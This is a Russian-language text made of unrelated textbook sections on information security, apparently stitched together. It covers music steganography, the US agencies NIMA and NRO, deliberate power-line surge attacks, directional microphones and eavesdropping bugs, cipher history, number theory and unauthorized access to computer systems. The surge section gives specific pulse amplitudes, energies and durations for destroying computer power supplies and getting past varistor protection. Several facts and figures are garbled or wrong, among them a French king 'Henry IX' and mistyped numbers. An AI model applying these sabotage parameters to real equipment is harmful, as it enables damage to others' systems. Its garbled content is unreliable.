Аналогом слова текстового предложения в музыкальном произведении будет один такт мелодии, а аналогом предложения в музыке будем считать фрагменты, разделяемые цензурами. Как правило, музыкальное произведение состоит из ряда фраз, которые состоят из тактов. Пусть имеется фрагмент мелодии, который представляет слово текста в виде соотношения ?(i, j) + … + ?(i + k, j + r) = xi(t), а также фрагмент мелодии, записанный в виде соотношения ? (?, ?) + … + ? (? + e, ? + q) = x?(m). Внедрение текста в музыкальное произведение осуществляется отдельными предложениями, каждое из которых может сопоставляться с отдельной мелодией.
На первом этапе работы стегосистемы анализируется количество мелодий (количество ее модификаций) в рамках музыкального произведения в сопоставлении с количеством предложений сообщения. На втором этапе осуществляется анализ допустимости расширения некоторого предложения музыкального произведения предложениями текста сообщения. Этот анализ проводится на основе исследования логических формул текста предложения L(t) и музыкального предложения L(m). На следующем этапе, в случае выбора соответствующей пары L(m) и L(t), осуществляется анализ преемственности фраз мелодий, отдельных слов текста и слов мелодии, что соответствует согласованию пар на уровне описания xi(t) и x?(m). После положительного решения задач перечисленных уровней формируется нотное отображение расширенного музыкального произведения с внедренным в него скрываемым сообщением. На основании нотного отображения расширения осуществляется его музыкальная реализация с помощью современных компьютерных систем, представляющих собой программно-аппаратные синтезаторы звука.
Дальнейшая звуковая обработка музыкальных записей, обработанных стегосистемой, не обязательна. Поскольку основная область применения музыкальных стегосистем — это среда Internet, в которой музыкальные записи размещаются в цифровом формате на Web-страницах, то достаточно, чтобы расширенное музыкальное произведение воспринималось посторонними лицами не как шум, а как некоторая музыка, которая обладает мелодией или совокупностью мелодий, допускающих ту или иную тематическую интерпретацию.
Литература
НАГК (NIMA)
НАГК — это одна из ведущих разведывательных служб США, имеющая статус органа боевого обеспечения МО. В качестве самостоятельной спецслужбы НАГК было образовано в 1996 году в соответствии с Законом “О Национальном агентстве по геодезии и картографии” (National Imagery and Mapping Agency Act). Она призвана обеспечивать политическое руководство и командование Вооруженных Сил США своевременной, корректной и точной информацией геодезической разведки. Эта информация получается на основе изучения и анализа фотографической и геодезической информации, которая позволяет описать, оценить и представить визуально физические характеристики земной поверхности и географические особенности деятельности в заданном регионе.
В состав НАГК входят следующие управления.
Аналитическое управление (Analysis & Production Directorate). Предоставляет данные геодезической разведки политическому и военному руководству, командованию войсковых операций, а также гражданским федеральным учреждениям и международным организациям.
Управление материально-технического обеспечения (Acquisition Directorate). Определяет потребности НАГК в системах, комплексах, услугах и бизнес-решениях и приобретает их с целью обеспечения лидирующей роли НАГК в геодезической разведке. Управление отвечает за приобретение таких систем, которые бы обеспечивали преобладание США в области визуальной, фото- и геодезической разведки. Управление занимается исследованиями, необходимыми для приобретения оборудования; разработкой программ закупки; системным инжинирингом; научными исследованиями в области системного инжиниринга, методики закупок, инжиниринга инфраструктуры, а также обработки изображений и геодезии.
Управление инноваций и перспективного планирования (InnoVision Directorate). Разрабатывает прогнозы по развитию политической, военной и технической обстановки, определяет будущие потребности в геодезической разведке, разрабатывает планы по развитию ресурсов НАГК, обеспечивая их соответствие этим потребностям, а также предоставляет НАГК технологические и организационные решения, обеспечивающие в будущем лидирующие позиции США в этой области.
Намеренное силовое воздействие по сетям питания
Под намеренным силовым воздействием (НСВ) по сетям питания понимается преднамеренное создание резкого выплеска напряжения в сети питания с амплитудой, длительностью и энергией всплеска, которые способны привести к сбоям в работе оборудования или к выходу его из строя. Для НСВ используют специальные технические средства (ТС), которые подключаются к сети непосредственно с помощью гальванической связи, через конденсатор или трансформатор. НСВ может быть использовано и для предварительного вывода из строя сигнализации перед нападением на объект или для провоцирования ложных срабатываний сигнализации без проникновения на объект.
Компьютер или другое электронное оборудование автоматизированных систем (АС) имеет два значимых для проникновения энергии НСВ по сети питания канала:
кондуктивный путь через источник вторичного электропитания (ВИП);
наводки через паразитные емкости и индуктивные связи, как внутренние, так и между совместно проложенными силовыми кабелями и информационными линиями связи (ИЛС).
На рис. 14.2 показаны упрощенные схемы этих каналов. Между сетью питания и ВИП, как правило, устанавливается дополнительное устройство защиты (УЗ). Такое устройство (UPS, стабилизатор и т.п.) влияет на канал распространения энергии НСВ, что также должно быть учтено. ИЛС подключена к компьютеру через устройство гальванического разделения (УГР) (трансформатор, оптопара и т.п.), которое, как правило, присутствует на входе модема, сетевой платы и других узлах АС. Вход/выход ВИП и УЗ зашунтированы собственной емкостью монтажа, трансформатора и т.п.
Рис. 14.2. Схема образования каналов проникновения НСВ
Аппаратная часть компьютера за ВИП весьма чувствительна к воздействию импульсных помех. Сбой в работе цифровых микросхем возникает при появлении на шине питания импульса с амплитудой в единицы вольт при длительности в десятки наносекунд. Деградация цифровых микросхем наступает при воздействии импульсов напряжения длительностью 1 мкс с энергией 2–500 мкДж. Однако в целом компьютеры и периферийные более устойчивы к электромагнитным помехам и должны выдерживать воздействие по цепям электропитания всплесков напряжения 0,2 Uном и время до 500 мс, микросекундных и наносекундных импульсных помех с амплитудой до 1 кВ, а в цепях ввода/вывода — наносекундных импульсных помех амплитудой 500 В.
Подавление импульсных помех на пути из сети питания к чувствительным микросхемам происходит во входных цепях ВИП (главным образом во входном фильтре). Эти же узлы принимают на себя удар НСВ по сети питания. У низкокачественных ВИП отсутствуют некоторые элементы цепей защиты (чаще всего — варисторы и термисторы) и (или) используются более дешевые элементы (конденсаторы с меньшей емкостью, варисторы с меньшей энергией, вместо термисторов — обычные резисторы).
Для оценки устойчивости ВИП к НСВ достаточно оценить предельную энергопоглощающую способность Wmax
и электрическую прочность ряда элементов схемы и сопоставить ее в дальнейшем с энергией и входным напряжением ТС НСВ. При этом следует учитывать, что энергия при НСВ может распространяться по симметричному (между линиями) и несимметричному пути (между линиями и корпусом).
Таким образом, элементы входного LC-фильтра имеют чрезвычайно низкие уровни Wmax
и не являются препятствием на пути мощных импульсных помех. Это вполне объяснимо, поскольку LC-фильтр в основном предназначен для решения обратной задачи, а именно — препятствовать распространению собственных шумов ВИП в сеть питания. Уровень шумов составляет доли вольта, поэтому при проектировании фильтра предельная энергопоглощающая способность его элементов не является определяющим фактором. Если LC-фильтр — это единственное устройство защиты на входе ВИП (а именно так устроено большинство дешевых ВИП), то ТС НСВ достаточно обеспечить возможность подвода к каждому атакуемому компьютеру мощной импульсной помехи с амплитудой порядка 2 кВ и энергией 1–2 Дж с достаточно крутым фронтом, уменьшающим влияние емкостного фильтра инвертора ВИП.
Основные функции защиты от мощных импульсных помех в качественных ВИП принимает на себя варистор. Несмотря на впечатляющие уровни рабочих токов, варисторы имеют предельно допустимую рассеиваемую мощность, исчисляемую единицами Вт, поэтому при воздействии длинных импульсов с относительно небольшим током они выходят из строя или срабатывают, вызывая сгорание предохранителя на входе ВИП.
Перегорание предохранителя приводит к необходимости демонтажа и ремонта ВИП, тем самым объект атаки (компьютер) на время выводится из строя. Тем не менее, в данном случае ТС НСВ требуется энергия порядка 50–100 Дж при амплитуде порядка 1 кВ (при этом длительность импульса может доходить до 0,1 с для инерционных предохранителей) в расчете на один атакуемый компьютер, а их может быть одновременно подключено к сети питания большое количество. С учетом того, что существенная доля энергии при этом может передаваться не на вход ВИП, а в общегородскую сеть питания (по меньшей мере до ближайшей трансформаторной подстанции), конструкция ТС НСВ усложняется, возрастают габариты и требуется большее вмешательство в сеть питания объекта атаки для подключения ТС НСВ.
Значительно меньше энергии требуется для повреждения конденсаторов входного фильтра инвертора и диодов выпрямительного моста. При этом ТС НСВ генерирует импульс, “обходящий” варисторную схему защиты. Используется разница в напряжении пробоя конденсаторов и напряжения, при котором наступает эффективное ограничение напряжения варистором (оно больше напряжения пробоя конденсаторов на 70–120 В). Для такого ТС НСВ в пересчете на один атакуемый компьютер достаточно энергии 15–25 Дж при амплитуде импульса 500–600 В и длительности до 5 мс. После пробоя конденсаторов дополнительно возникает импульс тока через диоды моста, который при горячем термисторе доходит до 1000 А, выводя диоды из строя. Для большинства ВИП при таком воздействии весьма вероятен выход из строя трансформаторов и других элементов инвертора, а также забросы напряжения на выходе ВИП, приводящие к повреждению других узлов компьютера.
Входные высоковольтные и выходные низковольтные цепи ВИП компьютеров имеют емкостную связь через паразитную емкость Cвх/вых = 10–30 пФ. Большая величина паразитной емкости обусловлена тем, что в подавляющем большинстве компьютерных ВИП сложно реализовать специфические требования, предъявляемые к конструкции фильтров НЧ (разбивку корпуса на экранированные отсеки, применение элементов с малой собственной емкостью/индуктивностью, оптимальная трассировка монтажных жгутов и т.п.).
Из-за прокладки кабеля к сетевому выключателю внутри корпуса компьютера без учета требований электромагнитной совместимости появляется паразитная емкость Cсеть-плата = 5–10 пФ, связывающая сеть питания с элементами материнской платы. Если ТС НСВ используют для провоцирования сбоев в работе АС, то они генерируют высоковольтные импульсы с наносекундными временными нарастаниями. Для таких импульсов импеданс паразитных емкостей составляет доли Ом, поэтому энергия импульсов эффективно передается как на шины питания узлов АС в виде импульсов напряжения, так и во внутренние объемы корпусов компьютеров и другого оборудования в виде импульсных электромагнитных полей. Следствием является “зависание” компьютеров, сбои в работе программного обеспечения, искажение данных. Повреждение микросхем такими импульсами маловероятно.
Вежекторный дроссель и конденсаторы входного LC-фильтра ВИП образуют высокодобротный колебательный контур с волновым сопротивлением приблизительно на порядок большим волнового сопротивления сетевых проводов. Поэтому при падении из сети питания импульса с крутым фронтом амплитуда импульса на выходе фильтра может возрасти в 1,5 раза (нечто подобное происходит со всеми фильтрами, не рассчитанными при проектировании на подавление мощных импульсов). Этот импульс может включить трансформатор инвентора ВИП в момент, не соответствующий алгоритму системы управления. Включение трансформатора может привести к забросу напряжения на выходе ВИП или к повреждению ВИП. Далее тип сетевого включателя ПЭВМ может оказать влияние на устойчивость АС по отношению к НСВ.
ТС НСВ генерирует высоковольтный импульс с крупным фронтом наносекундного диапазона и подключается к сетевому кабелю по несимметричной схеме — между жилой и шиной заземления в трехпроводной сети с изолированной нейтралью. Если витая пара проложена совместно с сетевым кабелем в общем коробе, то при разнесении их на расстояние до 100 мм и с наличием участка совместной прокладки длиной более 2–5 м индуцированное импульсное напряжение на жилах витой пары может достигать амплитуды напряжения на выходе ТС НСВ.
Энергия импульса напряжения на жилах витой пары составляет максимум 50–100 МДж и слабо зависит от энергии, генерируемой ТС НСВ. Наибольшую опасность индуцированное импульсное напряжение может представлять для изоляции на корпус УГР, которое может быть пробито и тем самым УГР выведено из строя.
Дополнительные устройства защиты типа простейших ограничителей, фильтров, UPS по схеме “off-line”, импортных релейных сетевых конденсаторов и т.п. имеют в качестве элементов зашиты от помех НЧ-фильтры и варисторы. Защита от перегрузок предусматривает отключение устройства. Поэтому все сказанное относительно недостатков входного фильтра ВИП применительно и к ним. Высококачественные фильтры отечественного производства с проходными конденсаторами хороши для защиты от радиопомех, но при НСВ разрушаются с взрывоподобным эффектом из-за низких предельно допустимых напряжений проходных конденсаторов. UPS по схеме “on- line”, в принципе, должны защищать оборудование от НСВ. Однако реальные конструкции этой защиты не обеспечивают. Прежде всего, UPS имеет схему питания собственных нужд, которая содержит импульсный ВИП, аналогичный компьютерному, поэтому при НСВ по сети питания UPS выходит из строя. При этом обычно срабатывает байпас, и через него энергия ТС НСВ беспрепятственно достигает цели в обход UPS.
Практически любые стабилизаторы и конденсаторы напряжения, предлагаемые для защиты ПЭВМ, имеют слабую защиту нагрузки и питания собственных нужд от импульсных помех.
Направленные акустические микрофоны (НАМ)
Данная техника предназначена для прослушивания акустической информации с определенного направления и с больших расстояний. В зависимости от конструкции НАМ, ширина главного луча диаграммы направленности находится в пределах 5–30°, величина коэффициента усиления 5–20. По типу используемых антенных систем НАМ бывают.
Зеркальные (микрофон НАМ находится в фокусе параболической антенны). Расстояние 500 м и более, диаметр зеркала составляет до 1 м, диаграмма направленности — до 8°.
Микрофон-трубка (обычно маскируется под трость или зонт), при этом дальность действия до 300 м, а диаграмма направленности — до 18°. При повышении уровня шумов до 60 дБ дальность снижается до 100 м.
НАМ органного типа (большие мобильные или стационарные установки, в частности, применяемые в пограничных войсках для прослушивания акустических сигналов с сопредельной территории и др.), позволяет осуществлять прослушивание до 1000 м.
Плоские НАМ, использующие в качестве антенной системы фазированную антенную решетку (ФАР), обычно маскируются под кейс, в крышку которого монтируется ФАР.
Акустическая разведка методом пассивного перехвата основана на перехвате акустической волны направленными микрофонами.
Акустические методы перехвата — облучение колеблющихся предметов в УФ и ИК диапазонах, оптическим лазерным стетоскопом. Используется также облучение радиолучом, но при этом устойчивый прием информации возможен на расстоянии 300–400 м. Ультразвуковой съем информации возможен во всех направлениях из-за широкой диаграммы направленности антенной системы и на расстоянии 300 м.
Контактные методы — это закладные устройства:
радиомикрофоны непрерывного действия;
радиомикрофоны с выключением питания;
радиомикрофоны с управлением по радио;
радиомикрофоны с дистанционным питанием;
стетоскопы.
Осуществляется съем речевой информации по следующим цепям:
звонковая цепь;
реле;
съем информации с измерительной головки вольтметров и амперметров;
система радиотрансляции;
система электрочасофикации;
система пожарной и охранной сигнализации.
Негативное воздействие закладки на программу
Классификация закладок по негативным воздействиям, которые они могут оказывать на прикладные программы, приведена в табл. 14.1.
Таблица 14.1. Классификация закладок по негативным воздействиям
Несанкционированные операции, выполняемые закладкой | Действие | Операции, выполняемые прикладной программой (ПП) | |||||||||
Тип | Считывание | Запись | Считывание | Запись | |||||||
1 | 0 | 0 | нет | 0 | 0 | ||||||
2 | 0 | 0 | нет | 0 | 1 | ||||||
3 | 0 | 0 | нет | 1 | 0 | ||||||
4 | 0 | 0 | нет | 1 | 1 | ||||||
5 | 0 | 1 | разрушение кода ПП в оперативной памяти (ОП) | 0 | 0 | ||||||
6 | 0 | 1 | разрушение или сохранение выводимых данных | 0 | 1 | ||||||
7 | 0 | 1 | разрушение или сохранение вводимых данных | 1 | 0 | ||||||
8 | 0 | 1 | разрушение или сохранение вводимых и выводимых данных | 1 | 1 | ||||||
9 | 1 | 0 | нет | 0 | 0 | ||||||
10 | 1 | 0 | перенос выводимых данных в ОП | 0 | 1 | ||||||
11 | 1 | 0 | перенос вводимых данных в ОП | 1 | 0 | ||||||
12 | 1 | 0 | перенос вводимых и выводимых данных в ОП | 1 | 1 | ||||||
13 | 1 | 1 | размножение | 0 | 0 | ||||||
14 | 1 | 1 | разрушение или сохранение выводимых данных | 0 | 1 | ||||||
15 | 1 | 1 | разрушение или сохранение вводимых данных | 1 | 0 | ||||||
16 | 1 | 1 | разрушение или сохранение вводимых и выводимых данных | 1 | 1 |
Некоторые подходы к решению проблемы ЗИ
Рассмотрим некоторые частные случаи решения проблемы ЗИ.
Способ защиты видеоинформации при ее передаче зависит от способа передачи (оптоволоконный канал, телефонный канал, проводной канал, телевизионный канал и др.), предполагаемого способа нападения, формы воздействия на видеоинформацию.
Рис. 15.6. Семантическая схема проблемы ЗИ с помощью технических
средств с позиций причинно-следственной иерархии
Способ защиты видеоинформации при ее хранении зависит от типа носителя информации, форм воздействия на информацию или ее носитель, предполагаемого способа нападения.
Способ защиты звуковой информации зависит: при хранении — от типа носителя, форм воздействия на информацию или ее носитель, предполагаемого способа нападения; при передаче — от способа передачи, предполагаемого способа нападения, форм воздействия на информацию.
Способ защиты информации, существующей в виде электромагнитного сигнала, зависит от среды распространения электромагнитного сигнала, длины волны сигнала, наличия или отсутствия специальной линии связи, типа линии связи, предполагаемого способа нападения на информацию.
Немного истории
Долгое время занятие криптографией было уделом одиночек. Среди них были одаренные ученые, дипломаты и священнослужители. Известны случаи, когда криптографию считали даже черной магией. Этот период развития криптографии, как искусства, длился с незапамятных времен до начала XX века, когда появились первые шифровальные машины. Понимание математического характера решаемых криптографических задач пришло только в середине XX века, после работ выдающегося американского ученого К. Шеннона.
Свой след в истории криптографии оставили многие хорошо известные исторические личности.
Первые сведения об использовании шифров в военном деле связаны с именем спартанского полководца Лисандра (шифр “Сциталь”, V век д.н.э). Цезарь использовал в переписке шифр, который вошел в историю как “шифр Цезаря”. В древней Греции был изобретен вид шифра, который в дальнейшем назывался “Квадрат Полития”. Братство франкмасонов с момента своего возникновения (VIII век) разработало и использовало целую систему особых шифров.
Одну из первых книг по криптографии написал аббат И. Тритемий (1462-1516 гг.) живший в Германии. В 1566 г. известный механик и математик Д. Кардано опубликовал работу с описанием изобретенной им системы шифрования (“решетка Кардано”). Франция XVI века оставила в истории криптографии шифры короля Генриха IX и Ришелье. В России наиболее известным шифром является “цифровая азбука” 1700 года, автором которой был Петр I.
Некоторые сведения о свойствах шифров и их применения могло найти в художественной литературе и кино. Хорошее и подробное объяснение одного из простейших шифров — шифра замены и методов его вскрытия содержится в двух известных рассказах: “Золотой жук” Э. По и “Пляшущие человечки” А. Конан-Дойля.
Рассмотрим более подробно некоторые примеры.
Шифр “Сциталь”. Этот шифр известен со времен войны Спарты и Персии против Афин. Спартанский полководец Лисандр подозревал персов в измене, но не знал их тайных планов. Его агент в стане персов прислал шифрованное сообщение, которое позволило Лисандру опередить персов и разгромить их.
Шифрованное сообщение было написано на поясе официального гонца от персов следующим образом: агент намотал пояс на сциталь (деревянный цилиндр определенного диаметра) и написал на поясе сообщение вдоль сциталя; потом он размотал пояс и получилось, что поперек пояса в беспорядке написаны буквы. Гонец не догадался, что узор на его красивом поясе на самом деле содержит зашифрованную информацию. Лисандр взял сциталь такого же диаметра, аккуратно намотал на него пояс и вдоль сциталя прочитал сообщение от своего агента.
Отметим, что в этом шифре преобразование открытого текста в шифрованный заключается в определенной перестановке букв открытого текста. Поэтому класс шифров, к которым относится и шифр “Сциталь”, — это перестановочные шифры.
Шифр Цезаря. Этот шифр реализует следующие преобразования открытого текста: каждая буква открытого текста заменяется третьей после нее буквой в алфавите, который считается по кругу, т.е. после буквы “я” следует буква “а”. Поэтому класс шифров, к которым относится и шифр Цезаря, — это подстановочные шифры.
Например, открытый текст КРИПТОГРАФИЯ при таком способе шифрования преобразуется в шифртекст НУЛТХСЕУГЧЛВ.
Отметим, что Цезарь заменял букву третьей после нее буквой, но можно заменять и пятой, и любой другой. Главное, чтобы тот, кому посылается шифрованное сообщение, знал эту величину сдвига.
Шифр Виженера. Этот шифр относится к семейству полиалфавитных подстановочных шифров. Его удобнее всего представить, как шифр Цезаря с переменной величиной сдвига. Чтобы знать, на сколько сдвигать очередную букву открытого текста, заранее оговаривается способ запоминания сдвигов. Для этой цели используется ключевое слово, каждая буква которого своим номером в алфавите указывает величину сдвига. Ключевое слово повторяется столько раз, сколько нужно для замены всех букв открытого текста. Например, если ключевое слово ВАЗА, а открытый текст — КРИПТОГРАФИЯ, значит, ключевое слово даст следующую последовательность сдвигов букв открытого текста
319131913191
При таком способе шифрования открытый текст преобразуется в шифротекст
НССРХПЛСГХСА
Дальнейшее развитие идеи ключевого слова, а именно идея запоминать способ преобразования открытого текста с помощью какой-либо книги, привело к возникновению различных видов так называемых книжных шифров.
Результаты криптографических исследований реализуются сейчас в виде шифрующих устройств, встроенных в современные системы связи. Поэтому криптографы ограничены в выборе средств тем уровнем техники и технологии, который достигнут на данный момент. Такая зависимость отражается и на выборе используемого в криптографии математического аппарата.
Условно можно выделить три принципиально разных этапа в развитии математического аппарата криптографии.
До 40-х годов XX века применялись только электромеханические шифромашины, поэтому и спектр математических преобразований был ограничен, в основном, методами комбинаторного анализа и теории вероятностей.
После появления электронной техники, а тем более компьютеров, сильно изменился и математический аппарат криптографии. Получили развитие прикладные идеи и методы теории информации, алгебры, теории конечных автоматов.
Работы Диффи и Хеллмана (70-е годы) послужили толчком для бурного развития новых направлений математики: теории односторонних функций, доказательств с нулевым разглашением. В наше время прогресс именно в этих направлениях определяет практические возможности криптографии.
Однако для того, чтобы криптографические методы преобразования обеспечили эффективную защиту информации, они должны удовлетворять ряду требований. В сжатом виде их можно сформулировать следующим образом:
сложность и стойкость криптографического закрытия должны выбираться в зависимости от объема и степени секретности данных;
надежность закрытия должна быть такой, чтобы секретность не нарушалась в том случае, когда злоумышленнику становится известен метод закрытия;
метод закрытия, набор используемых ключей и механизм их распределения не могут быть слишком сложными;
выполнение процедур прямого и обратного преобразований должно быть формализованным. Эти процедуры не должны зависеть от длины сообщений;
ошибки, возникающие в процессе выполнения преобразования, не должны распространяться на текст в полной мере и по системе;
вносимая процедурами защиты избыточность должна быть минимальной.
Необходимые сведения из элементарной теории чисел
1. Простым числом называется натуральное число, имеющее только два неравных натуральных делителя.
2. Каждое натуральное число единственным образом, с точностью до порядка записи сомножителей, представляется в виде произведения степеней простых чисел.
3. Наибольшим общим делителем двух целых чисел НОД(a,b) (или (a,b)) называется наибольшее целое, на которое без остатка делится как a, так и b.
4. Пусть a > b и d = (a,b). Тогда существуют целые x и у, являющиеся решением уравнения xa + yb = d. Если d = 1, то a и b называются взаимно простыми.
5. Наибольший общий делитель двух чисел можно найти с помощью алгоритма Эвклида. Для этого a делится с остатком на b, т.е. а = q1b + r1. Далее вместо a и b, рассматриваем соответственно b и r1: b = q2r1+ r2. На следующем шаге роль b и r1, играют r1 и r2: r1 = q3r2
+ r3 и т.д. Процесс заканчивается на некотором шаге k+1, для которого rk+1= 0. Тогда НОД(a,b) = rk. Рассмотрим пример.
Найти НОД(1547, 560)
1547 = 2 х
560 + 427
560 = 1 х 427 + 133
427 = 3 х 133 + 28
133 = 4 х 28 + 21
28 = 1 х 21 + 7
21 = 3 х 7 + 0
НОД(1547,560)=7
6. Для решения уравнения xa + yb = d можно использовать данные, полученные в каждом шаге алгоритма Эвклида, двигаясь снизу вверх, с помощью выражения остатка через другие элементы, используемые в соответствующем шаге. Например, из r2 = q4r3
+ r4 следует r4 = r2 +q4r3. В последнем равенстве r3 можно заменить, исходя из соотношения r1
= q3r2 + r3, т.е. r4 = r2 – q4(q3r2
– r1). Поэтому r4 = (1 – q4q3)r2
+ q4r1. Таким образом, мы выразили r4 в виде целочисленной комбинации остатков с меньшими номерами, которые, в свою очередь, могут быть выражены аналогично. Продвигаясь “снизу вверх”, в конце концов, мы выразим r4 через исходные числа a и b. Если бы мы начали не с r4, а с rk, то получили бы rk
= xa + yb = d. Рассмотрим пример.
Решить 1547х + 560y = 7
7 = 28 – 1 х 21 = 28 – 1 х (133 — 4 х 28) = 5 х 28 - 1 х 1ЗЗ =
= 5 х (427 - 3 х 133) — 1 х 13З = 5 х 427 – 16 х (560 - 1 х 427)=
= 21 х 427 - 16 х 560 = 21 х (1547 - 2 х 560) - 16 х 560 =
= 21 х 547 - 58 х 560
Решение: x = 21, y = -58
7. Число a сравнимо с числом b по модулю n, если a – b делится на n. Запись данного утверждения имеет следующий вид: а = b(mod n). Наименьшее неотрицательное число а, такое, что а = A(mod n) называется вычетом числа A по модулю n. Если (a,n) = 1, то существует x, такое, что x = a-1 (mod n).
Действительно, (a,n) = 1 = d = ax + ny, поэтому ax = 1(mod n). Такое число x называется обратным к а по модулю n и записывается в виде a-1 (mod n).
8. Пусть функция j(n), где n — натуральное число, равна количеству натуральных чисел, меньших n, для которых (а,n)=1. Такая функция называется функцией Эйлера. Для чисел n вида
n = (pi — простое) функция Эйлера определяется как ?(n) = .
9. Теорема Эйлера. Пусть (а,n) = 1. Тогда a?(n) = 1(mod n).
Следствие. Если ed = 1(mod ?(n)) и (a, n) = 1, то (аe)d
= а(mod n).
10. Для большинства вычетов по модулю n = pq показатель степени в соотношении a?(n) = 1(mod n) может быть уменьшен, но в этом случае он зависит от a. Наименьший показатель k(a), для которого ak(a) = 1(mod n), называется порядком числа a по модулю n и обозначается как оrdn(a). Для любого a значение оrdn(a) является делителем значения функции Эйлера ?(n).
Несанкционированное получение информации из АС
Рассмотрим наиболее распространенные методы и средства для несанкционированного получения информации из автоматизированных систем (АС). Сегодня эти методы и средства в связи с широким распространением ПЭВМ, взаимодействующих через локальные и глобальные сети, приобрели такую популярность, что нередко само понятие “защита информации” применяется исключительно в смысле защиты информации, обрабатываемой в АС, от утечки через компьютерные сети. Некоторые специалисты по ЗИ склонны выделять утечку информации через компьютерные сети в отдельный канал, равноценный другим техническим каналам утечки информации. Однако, в отличие от таких технических каналов, как радиоканал или акустический канал, утечка информации из АС по компьютерной сети является следствием не побочных, нежелательных процессов, вызванных конструктивными особенностями аппаратных средств и не учтенных разработчиками, а основных, штатных процессов, выполняющихся в АС в соответствии с замыслом разработчиков.
Конечно, в определенном смысле утечка информации по компьютерным сетям также возникает вследствие несовершенства программно-аппаратных решений, реализованных в АС. Но, тем не менее, пользуясь подобными изъянами в архитектуре АС, злоумышленник все же использует ее ресурсы и процессы по прямому назначению.
Например, дисплей ПЭВМ конструируется для отображения информации. Пользуясь побочными процессами, возникающими во время работы дисплея (ПЭМИН), злоумышленник может восстановить информацию, отображаемую на экране дисплея. В таких случаях можно говорить о наличии технического канала утечки информации. Но представим ситуацию, в которой этот же злоумышленник каким-либо образом получает доступ в помещение, в котором работает легальный пользователь (например, выдав себя за контролирующее лицо), и, встав за спиной пользователя, ознакамливается с той же информацией, что и в первом случае. Понятно, что в подобной ситуации нельзя говорить о техническом канале утечки информации, поскольку техническое средство (дисплей) используется злоумышленником по прямому назначению.
Если же злоумышленник получает удаленный доступ к компьютеру пользователя по сети, то действия злоумышленника после получения такого доступа очень сходны с действиями при получении непосредственного доступа, например, когда легальный пользователь отлучился от рабочего места.
Таким образом, выделение явлений, приводящих к утечке информации из АС (в частности, по компьютерным сетям) в отдельную группу, образующую самостоятельный технический канал утечки информации, вряд ли оправдано. Скорее, подобные явления можно классифицировать как специфическую разновидность явлений, приводящих к возникновению материально-вещественного канала утечки информации.
Действительно, независимо от методов и средств, используемых злоумышленниками для несанкционированного получения информации из АС, в результате всегда на тех или иных носителях, находящихся в распоряжении злоумышленников, возникают электромагнитные поля, совокупность которых представляет собой полученную ими информацию. С технической и юридической точки зрения эта информация представляет собой точную копию исходной информации, в подавляющем большинстве случаев неотличимую от оригинала. В определенных ситуациях, когда у злоумышленника имеется физический доступ к АС, для получения такого же результат он может просто прибегнуть к хищению носителей информации (например, жесткого диска). Юридические последствия из-за хищения собственно носителя могут быть весьма малыми, учитывая неуклонную тенденцию к снижению стоимости аппаратных средств современных ЭВМ, чего нельзя сказать о юридических последствиях, которые могут возникнуть из-за хищения записанной на носителе информации.
Все вышесказанное позволяет сделать вывод о том, что явления, приводящие к утечке информации из АС из-за несовершенства программно-аппаратных решений, можно с некоторыми допущениями отнести к материально-вещественному каналу. Однако, строго говоря, корректнее их относить к современной разновидности тайного физического проникновения (ТФП), т.е. не к техническим, а к агентурным методам добывания информации.
В частности, злоумышленники, пытающиеся получить доступ к АС, нередко прибегают к так называемому социальному инжинирингу (social engineering). Социальный инжиниринг — это использование психологии для скрытного добывания критичной с точки зрения доступа к АС информации (как правило — паролей, имен, кодов доступа и т.п.) у ее носителей. “Могущество” таких хакеров, как Кевин Митник и Роско, заключается не только и не столько в их технической подготовке, сколько в использовании методов социального инжиниринга.
Персонал, наряду с аппаратными средствами, программным обеспечением, данными и документацией является, по определению, составной частью любой АС. Однако рассмотрение всей совокупности вопросов, связанных с добыванием информации путем социального инжиниринга, далеко выходит за рамки данной книги. Поэтому, учитывая остроту проблемы несанкционированного получения информации из АС, мы ограничимся лишь обзорным описанием технической стороны этой проблемы, не затрагивая ее гуманитарной составляющей.
Низкочастотные излучатели
Низкочастотными (НЧ) излучателями электромагнитных колебаний в основном являются звукоусилительные устройства различного функционального назначения и конструктивного исполнения. В ближней зоне таких устройств наиболее мощным выступает магнитное поле опасного сигнала. Такое поле усилительных систем достаточно легко обнаруживается и принимается посредством магнитной антенны и селективного усилителя звуковых частот (рис. 4.3).
Рис. 4.3. Прием НЧ сигналов
НУВКР (NRO)
НУВКР — американская спецслужба, отвечающая за ведение стратегической воздушно-космической разведки и воздушного наблюдения. Осуществляет свои функции с помощью космических спутников и самолетов-разведчиков U-2.
НУВКР несет ответственность за разработку и создание всех американских разведывательных спутников, а также за их последующее использование. В задачи управления входят: предупреждение и оповещение о выявленных на основе поставляемой спутниками информации угрозах; контроль за выполнением соглашений о сокращении вооружений; наблюдение из космоса за военными операциями и маневрами, а также за природными бедствиями и катаклизмами; обеспечение спутниковой поддержки программ изучения и защиты окружающей среды. В распоряжении НУВКР имеются спутники радиолокационного дозора, разведки каналов связи и другие спутники специального назначения для обеспечения и контроля всех возможных видов связи. НУВКР также отвечает за добывание данных для составления компьютерных карт целеуказания, наведения управляемых ракет большой дальности.
Управление является структурным подразделением МО США, но в РС входит на правах самостоятельного участника (и, следовательно, по вопросам разведки подчиняется ДЦР). В распоряжении НУВКР находится множество наземных станций, принимающих информацию со спутников в разных точках земного шара.
Структурно НУВКР состоит из аппарата директора, четырех управлений и ряда отделов.
Основные подразделения.
Управление радиотехнической разведки (SIGINT Systems Acquisition & Operations Directorate).
Управление разведки средств связи (Communications Systems Acquisition & Operations Directorate).
Управление визуальной разведки (IMINT Systems Acquisition & Operations Directorate).
Управление передовых систем и технологий (Advanced Systems & Technology Directorate).
Отдел по управлению и эксплуатации (Management Services and Operations).
Вспомогательные подразделения.
Отдел контрактов.
Отдел контрразведки.
Исторический отдел.
Отдел протокола.
Отдел безопасности.
Отдел средств внутренней связи.
Отдел запусков космических аппаратов.
Факт существования НУВКР перестал быть государственной тайной США только в 1992 году. В 1995 году была рассекречена программа CORONA (1960–1972 гг., фоторазведка), и 800000 фотоснимков, полученных за годы существования этой программы, были переданы в Управление национальных архивов и документов (NARA — National Archives and Records Administration).
Обнаружение сигналов в условиях воздействиянепреднамеренных помех
Обнаружение сигналов в многовариантной классификации сводится к выбору одного из двух возможных на каждом конкретном этапе вариантов. При этом после обработки входного сигнала на входе принимается одно из двух возможных решений: полезный сигнал на входе присутствует (верна гипотеза H) или полезный сигнал на входе приемника отсутствует (верна гипотеза H).
